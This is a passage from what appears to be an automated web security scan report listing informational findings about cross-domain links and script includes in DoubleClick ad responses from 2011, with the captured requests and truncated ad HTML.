GET /adi/N5877.1509.0558551710521/B5104260.30;sz=300x250;dcopt=rcl;mtfIFPath=nofile;click=http://global.ard.yahoo.com/SIG=16a0cflfm/M=601197028.601690728.553434551.602895051/D=acont/S=2143440276:LREC/Y=YAHOO/E=acont:/EXP=1297455486/L=ynHb1EwNBq6AOlnWTSJnlQqBrcHW801VfV4AAU3T/B=Kw8rBWKImgo-/J=1297448286106314/K=i.p3kTtZ8NtM7LPPkyldmw/A=2376983297422890755/R=1/X=3/*;ord=1297448286106314? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.associatedcontent.com/business/?cat=3
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6773
Cache-Control: no-cache
Pragma: no-cache
Date: Fri, 11 Feb 2011 18:18:06 GMT
Expires: Fri, 11 Feb 2011 18:18:06 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
<noscript><a target="_blank" href="http://global.ard.yahoo.com/SIG=16a0cflfm/M=601197028.601690728.553434551.602895051/D=acont/S=2143440276:LREC/Y=YAHOO/E=acont:/EXP=1297455486/L=ynHb1EwNBq6AOlnWTSJnlQqBrcHW801VfV4AAU3T/B=Kw8rBWKImgo-/J=1297448286106314/K=i.p3kTtZ8NtM7LPPkyldmw/A=2376983297422890755/R=1/X=3/*http://ad.doubleclick.net/click%3Bh%3Dv8/3aab/7/113/%2a/v%3B234259830%3B1-0%3B0%3B58058786%3B4307-300/250%3B39874548/39892335/2%3B%3B%7Esscs%3D%3fhttp://www.forex.com/land-dummies.html?v=displaydum2&src=201101BTA7665&utm_source=Yahoo&utm_medium=banner&utm_campaign=2011DisplayUS"><img src="http://s0.2mdn.net/2363305/Dumrefresh_300x250.gif" width="300" height="250" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...

6.5. http://ad.doubleclick.net/adi/pcw.main.news/topics/consumer_advice/article previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/pcw.main.news/topics/consumer_advice/article

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/pcw.main.news/topics/consumer_advice/article;pg=article;aid=219333;c=2205;c=2210;pos=336showcase;tile=2;sz=336x280;ord=94084292?;c=win7

The response contains the following links to other domains:

http://s0.2mdn.net/2981993/336x280_GLOBAL_GENERIC_3.jpg
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/pcw.main.news/topics/consumer_advice/article;pg=article;aid=219333;c=2205;c=2210;pos=336showcase;tile=2;sz=336x280;ord=94084292?;c=win7 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/219333-2/online_dating_for_nerds_looking_for_love_in_all_the_wrong_postings.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Fri, 11 Feb 2011 19:30:00 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5592

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
3D0/ff/7c/ff%3B%7Efdr%3D233710169%3B0-0%3B0%3B28183772%3B4252-336/280%3B39969845/39987632/1%3B%3B%7Eaopt%3D2/0/7c/0%3B%7Esscs%3D%3fhttp://phones.verizonwireless.com/ruletheair/global/?cid=BAC-brnrsch"><img src="http://s0.2mdn.net/2981993/336x280_GLOBAL_GENERIC_3.jpg" width="336" height="280" border="0" alt="" galleryimg="no"></a>
...[SNIP]...

6.6. http://ad.doubleclick.net/adi/pcw.main.news/topics/consumer_advice/article previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/pcw.main.news/topics/consumer_advice/article

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/pcw.main.news/topics/consumer_advice/article;pg=article;aid=219333;c=2205;c=2210;pos=728leader;tile=1;sz=728x90;ord=48937370?;c=win7

The response contains the following links to other domains:

http://ar.voicefive.com/bmx3/broker.pli?pid=p81479006&PRAd=58779357&AR_C=40313979
http://s0.2mdn.net/2524173/BRAND_SECURITY_OCD_NA_728x90_A.jpg
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/pcw.main.news/topics/consumer_advice/article;pg=article;aid=219333;c=2205;c=2210;pos=728leader;tile=1;sz=728x90;ord=48937370?;c=win7 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/219333/online_dating_for_nerds_looking_for_love_in_all_the_wrong_postings.html?tk=hp_fv
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Fri, 11 Feb 2011 19:29:22 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6408

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
3D2/0/7c/0%3B%7Esscs%3D%3fhttp://www.cdw.com/content/people-who-get-it/default.aspx?cm_mmc=OnlineAds_FY2011%7CCDW%7CBRD_Launch-_-PC+World-_-ROS%7C728x90%7CAV-_-BRAND_SECURITY_OCD_NA_728x90_A#security"><img src="http://s0.2mdn.net/2524173/BRAND_SECURITY_OCD_NA_728x90_A.jpg" width="728" height="90" border="0" alt="Advertisement" galleryimg="no"></a></noscript><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p81479006&PRAd=58779357&AR_C=40313979"></script>
...[SNIP]...

6.7. http://ad.doubleclick.net/adi/pcw.main.news/topics/consumer_advice/article previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/pcw.main.news/topics/consumer_advice/article

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/pcw.main.news/topics/consumer_advice/article;pg=article;aid=219333;c=2205;c=2210;pos=728leader;tile=1;sz=728x90;ord=94084292?;c=win7

The response contains the following links to other domains:

http://redcated/M0N/iview/289553833/direct;wi.728;hi.90/01/332771?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aab/3/0/%2a/l%3B234184640%3B0-0%3B0%3B28183772%3B3454-728/90%3B40189981/40207768/1%3B%3B%7Eaopt%3D2/0/7c/0%3B%7Esscs%3D%3f
http://redcated/M0N/view/289553833/direct;wi.728;hi.90/01/332771

Request

GET /adi/pcw.main.news/topics/consumer_advice/article;pg=article;aid=219333;c=2205;c=2210;pos=728leader;tile=1;sz=728x90;ord=94084292?;c=win7 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/219333-2/online_dating_for_nerds_looking_for_love_in_all_the_wrong_postings.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Fri, 11 Feb 2011 19:29:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 1367

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><iframe src="http://view.atdmt.com/M0N/iview/289553833/direct;wi.728;hi.90/01/332771?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aab/3/0/%2a/l%3B234184640%3B0-0%3B0%3B28183772%3B3454-728/90%3B40189981/40207768/1%3B%3B%7Eaopt%3D2/0/7c/0%3B%7Esscs%3D%3f" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="728" height="90">
<script language="JavaScript" type="text/javascript">
...[SNIP]...
0/%2a/l%3B234184640%3B0-0%3B0%3B28183772%3B3454-728/90%3B40189981/40207768/1%3B%3B%7Eaopt%3D2/0/7c/0%3B%7Esscs%3D%3fhttp://clk.redcated/M0N/go/289553833/direct;wi.728;hi.90/01/332771" target="_blank"><img border="0" src="http://view.atdmt.com/M0N/view/289553833/direct;wi.728;hi.90/01/332771" /></a>
...[SNIP]...

6.8. http://ad.doubleclick.net/adi/pcw.main.news/topics/consumer_advice/article previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/pcw.main.news/topics/consumer_advice/article

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/pcw.main.news/topics/consumer_advice/article;pg=article;aid=219333;c=2205;c=2210;pos=336showcase;tile=2;sz=336x280;ord=48937370?;c=win7

The response contains the following links to other domains:

http://redcated/M0N/iview/289553832/direct;wi.300;hi.250/01/297256?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aab/3/0/%2a/k%3B234184638%3B0-0%3B0%3B28183772%3B4252-336/280%3B40189957/40207744/1%3B%3B%7Eaopt%3D2/0/7c/0%3B%7Esscs%3D%3f
http://redcated/M0N/view/289553832/direct;wi.300;hi.250/01/297256

Request

GET /adi/pcw.main.news/topics/consumer_advice/article;pg=article;aid=219333;c=2205;c=2210;pos=336showcase;tile=2;sz=336x280;ord=48937370?;c=win7 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/219333/online_dating_for_nerds_looking_for_love_in_all_the_wrong_postings.html?tk=hp_fv
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Fri, 11 Feb 2011 19:29:24 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 1376

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><iframe src="http://view.atdmt.com/M0N/iview/289553832/direct;wi.300;hi.250/01/297256?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aab/3/0/%2a/k%3B234184638%3B0-0%3B0%3B28183772%3B4252-336/280%3B40189957/40207744/1%3B%3B%7Eaopt%3D2/0/7c/0%3B%7Esscs%3D%3f" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="300" height="250">
<script language="JavaScript" type="text/javascript">
...[SNIP]...
%2a/k%3B234184638%3B0-0%3B0%3B28183772%3B4252-336/280%3B40189957/40207744/1%3B%3B%7Eaopt%3D2/0/7c/0%3B%7Esscs%3D%3fhttp://clk.redcated/M0N/go/289553832/direct;wi.300;hi.250/01/297256" target="_blank"><img border="0" src="http://view.atdmt.com/M0N/view/289553832/direct;wi.300;hi.250/01/297256" /></a>
...[SNIP]...

6.9. http://ad.doubleclick.net/adi/pcw.main.news/topics/consumer_advice/article previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/pcw.main.news/topics/consumer_advice/article

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/pcw.main.news/topics/consumer_advice/article;pg=article;aid=219333;c=2205;c=2210;pos=728leader;tile=1;sz=728x90;ord=48937370?;c=win7

The response contains the following links to other domains:

http://redcated/M0N/iview/289802372/direct;wi.728;hi.90/01/294599?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aab/3/0/%2a/f%3B234711795%3B0-0%3B0%3B28183772%3B3454-728/90%3B40150438/40168225/1%3B%3B%7Eaopt%3D2/0/7c/0%3B%7Esscs%3D%3f
http://redcated/M0N/view/289802372/direct;wi.728;hi.90/01/294599

Request

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Fri, 11 Feb 2011 19:29:21 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 1367

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><iframe src="http://view.atdmt.com/M0N/iview/289802372/direct;wi.728;hi.90/01/294599?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aab/3/0/%2a/f%3B234711795%3B0-0%3B0%3B28183772%3B3454-728/90%3B40150438/40168225/1%3B%3B%7Eaopt%3D2/0/7c/0%3B%7Esscs%3D%3f" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="728" height="90">
<script language="JavaScript" type="text/javascript">
...[SNIP]...
0/%2a/f%3B234711795%3B0-0%3B0%3B28183772%3B3454-728/90%3B40150438/40168225/1%3B%3B%7Eaopt%3D2/0/7c/0%3B%7Esscs%3D%3fhttp://clk.redcated/M0N/go/289802372/direct;wi.728;hi.90/01/294599" target="_blank"><img border="0" src="http://view.atdmt.com/M0N/view/289802372/direct;wi.728;hi.90/01/294599" /></a>
...[SNIP]...

6.10. http://ad.doubleclick.net/adi/pcw.main.search/index previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/pcw.main.search/index

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/pcw.main.search/index;pg=index;pos=728leader;tile=1;sz=728x90;ord=87219630?;c=win7

The response contains the following links to other domains:

http://redcated/M0N/iview/289553834/direct;wi.728;hi.90/01/329271?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aab/3/0/%2a/s%3B234185256%3B0-0%3B0%3B30477257%3B3454-728/90%3B40189906/40207693/1%3B%3B%7Eaopt%3D2/0/82/0%3B%7Esscs%3D%3f
http://redcated/M0N/view/289553834/direct;wi.728;hi.90/01/329271

Request

GET /adi/pcw.main.search/index;pg=index;pos=728leader;tile=1;sz=728x90;ord=87219630?;c=win7 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/search.html?qt=web+services&s=d&tk=srch_art_tag
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Fri, 11 Feb 2011 19:29:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 1367

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><iframe src="http://view.atdmt.com/M0N/iview/289553834/direct;wi.728;hi.90/01/329271?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aab/3/0/%2a/s%3B234185256%3B0-0%3B0%3B30477257%3B3454-728/90%3B40189906/40207693/1%3B%3B%7Eaopt%3D2/0/82/0%3B%7Esscs%3D%3f" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="728" height="90">
<script language="JavaScript" type="text/javascript">
...[SNIP]...
0/%2a/s%3B234185256%3B0-0%3B0%3B30477257%3B3454-728/90%3B40189906/40207693/1%3B%3B%7Eaopt%3D2/0/82/0%3B%7Esscs%3D%3fhttp://clk.redcated/M0N/go/289553834/direct;wi.728;hi.90/01/329271" target="_blank"><img border="0" src="http://view.atdmt.com/M0N/view/289553834/direct;wi.728;hi.90/01/329271" /></a>
...[SNIP]...

6.11. http://ad.doubleclick.net/adi/pcw.main.search/index previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/pcw.main.search/index

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/pcw.main.search/index;pg=index;pos=728leader;tile=1;sz=728x90;ord=87219630?;c=win7

The response contains the following links to other domains:

http://redcated/M0N/iview/289553834/direct;wi.728;hi.90/01/330334?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aab/3/0/%2a/s%3B234185256%3B0-0%3B0%3B30477257%3B3454-728/90%3B40189906/40207693/1%3B%3B%7Eaopt%3D2/0/82/0%3B%7Esscs%3D%3f
http://redcated/M0N/view/289553834/direct;wi.728;hi.90/01/330334

Request

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Fri, 11 Feb 2011 19:29:57 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 1367

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><iframe src="http://view.atdmt.com/M0N/iview/289553834/direct;wi.728;hi.90/01/330334?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aab/3/0/%2a/s%3B234185256%3B0-0%3B0%3B30477257%3B3454-728/90%3B40189906/40207693/1%3B%3B%7Eaopt%3D2/0/82/0%3B%7Esscs%3D%3f" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="728" height="90">
<script language="JavaScript" type="text/javascript">
...[SNIP]...
0/%2a/s%3B234185256%3B0-0%3B0%3B30477257%3B3454-728/90%3B40189906/40207693/1%3B%3B%7Eaopt%3D2/0/82/0%3B%7Esscs%3D%3fhttp://clk.redcated/M0N/go/289553834/direct;wi.728;hi.90/01/330334" target="_blank"><img border="0" src="http://view.atdmt.com/M0N/view/289553834/direct;wi.728;hi.90/01/330334" /></a>
...[SNIP]...

6.12. http://ad.doubleclick.net/adi/pcw.main.search/index previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/pcw.main.search/index

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/pcw.main.search/index;pg=index;pos=336showcase;tile=2;sz=336x280;ord=87219630?;c=win7

The response contains the following links to other domains:

http://redcated/M0N/iview/289553835/direct;wi.300;hi.250/01/331428?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aab/3/0/%2a/g%3B234185511%3B0-0%3B0%3B30477257%3B4252-336/280%3B40337094/40354881/1%3B%3B%7Eaopt%3D2/0/82/0%3B%7Esscs%3D%3f
http://redcated/M0N/view/289553835/direct;wi.300;hi.250/01/331428

Request

GET /adi/pcw.main.search/index;pg=index;pos=336showcase;tile=2;sz=336x280;ord=87219630?;c=win7 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/search.html?qt=web+services&s=d&tk=srch_art_tag
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Fri, 11 Feb 2011 19:29:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 1376

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><iframe src="http://view.atdmt.com/M0N/iview/289553835/direct;wi.300;hi.250/01/331428?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aab/3/0/%2a/g%3B234185511%3B0-0%3B0%3B30477257%3B4252-336/280%3B40337094/40354881/1%3B%3B%7Eaopt%3D2/0/82/0%3B%7Esscs%3D%3f" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="300" height="250">
<script language="JavaScript" type="text/javascript">
...[SNIP]...
%2a/g%3B234185511%3B0-0%3B0%3B30477257%3B4252-336/280%3B40337094/40354881/1%3B%3B%7Eaopt%3D2/0/82/0%3B%7Esscs%3D%3fhttp://clk.redcated/M0N/go/289553835/direct;wi.300;hi.250/01/331428" target="_blank"><img border="0" src="http://view.atdmt.com/M0N/view/289553835/direct;wi.300;hi.250/01/331428" /></a>
...[SNIP]...

6.13. http://ad.doubleclick.net/adj/ars.dart/ce_gear previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/ars.dart/ce_gear

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/ars.dart/ce_gear;abr=!webtv;mtfIFPath=/mt-static/plugins/ArsTheme/ad-campaigns/doubleclick/;tile=1;dcopt=ist;kw=six-minute-keychain-hack-highlights-busted-iphone-security-model;kw=02;kw=2011;kw=news;kw=apple;sz=728x90;ord=71649246388114990;kw=cnnews;kw=all;kw=news

The response contains the following link to another domain:

http://s0.2mdn.net/1361549/PID_1522599_K1816_NLF_GEN_728.jpg

Request

GET /adj/ars.dart/ce_gear;abr=!webtv;mtfIFPath=/mt-static/plugins/ArsTheme/ad-campaigns/doubleclick/;tile=1;dcopt=ist;kw=six-minute-keychain-hack-highlights-busted-iphone-security-model;kw=02;kw=2011;kw=news;kw=apple;sz=728x90;ord=71649246388114990;kw=cnnews;kw=all;kw=news HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://arstechnica.com/public/shared/scripts/ad-loader-frame.html?req=http://ad.doubleclick.net/adj/ars.dart/ce_gear;abr=!webtv;mtfIFPath=/mt-static/plugins/ArsTheme/ad-campaigns/doubleclick/;tile=1;dcopt=ist;kw=six-minute-keychain-hack-highlights-busted-iphone-security-model;kw=02;kw=2011;kw=news;kw=apple;sz=728x90;ord=71649246388114990
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Fri, 11 Feb 2011 19:22:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 36828

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
%3B%3B%7Eaopt%3D3/0/8e/0%3B%7Esscs%3D%3fhttp://pixel.quantserve.com/r;a=p-5aa_ooycXTWzY;labels=_click.adserver.doubleclick*http://www.nissanusa.com/leaf?dcp=omd.58701966.&dcc=40437181.235219792&dcn=1"><IMG SRC="http://s0.2mdn.net/1361549/PID_1522599_K1816_NLF_GEN_728.jpg" width="728" height="90" BORDER=0 alt=""></A>
...[SNIP]...

7. Cross-domain script include previous next
There are 5 instances of this issue:

/adi/N4359.msn.comOX2567/B5091231.144
/adi/N4359.msn.comOX2567/B5091231.146
/adi/N5047.132797.8628078479321/B4150925.22
/adi/N5877.1509.0558551710521/B5104260.30
/adi/pcw.main.news/topics/consumer_advice/article

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

7.1. http://ad.doubleclick.net/adi/N4359.msn.comOX2567/B5091231.144 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N4359.msn.comOX2567/B5091231.144

Issue detail

The response dynamically includes the following script from another domain:

http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/N4359.msn.comOX2567/B5091231.144;sz=300x250;click=;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003L/11000000000033118.1?!&&PID=8154750&UIT=G&TargetID=28683750&AN=1662206136&PG=LIFYGB&ASID=f58c59c1bef74d229169f04a72a59f63&destination=;ord=1662206136? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://lifestyle.msn.com/your-life/your-money-today/staticslideshow.aspx?cp-documentid=27521348&gt1=32078
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

7.2. http://ad.doubleclick.net/adi/N4359.msn.comOX2567/B5091231.146 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N4359.msn.comOX2567/B5091231.146

Issue detail

The response dynamically includes the following script from another domain:

http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

Response

7.3. http://ad.doubleclick.net/adi/N5047.132797.8628078479321/B4150925.22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5047.132797.8628078479321/B4150925.22

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

Response

7.4. http://ad.doubleclick.net/adi/N5877.1509.0558551710521/B5104260.30 previous next

Summary

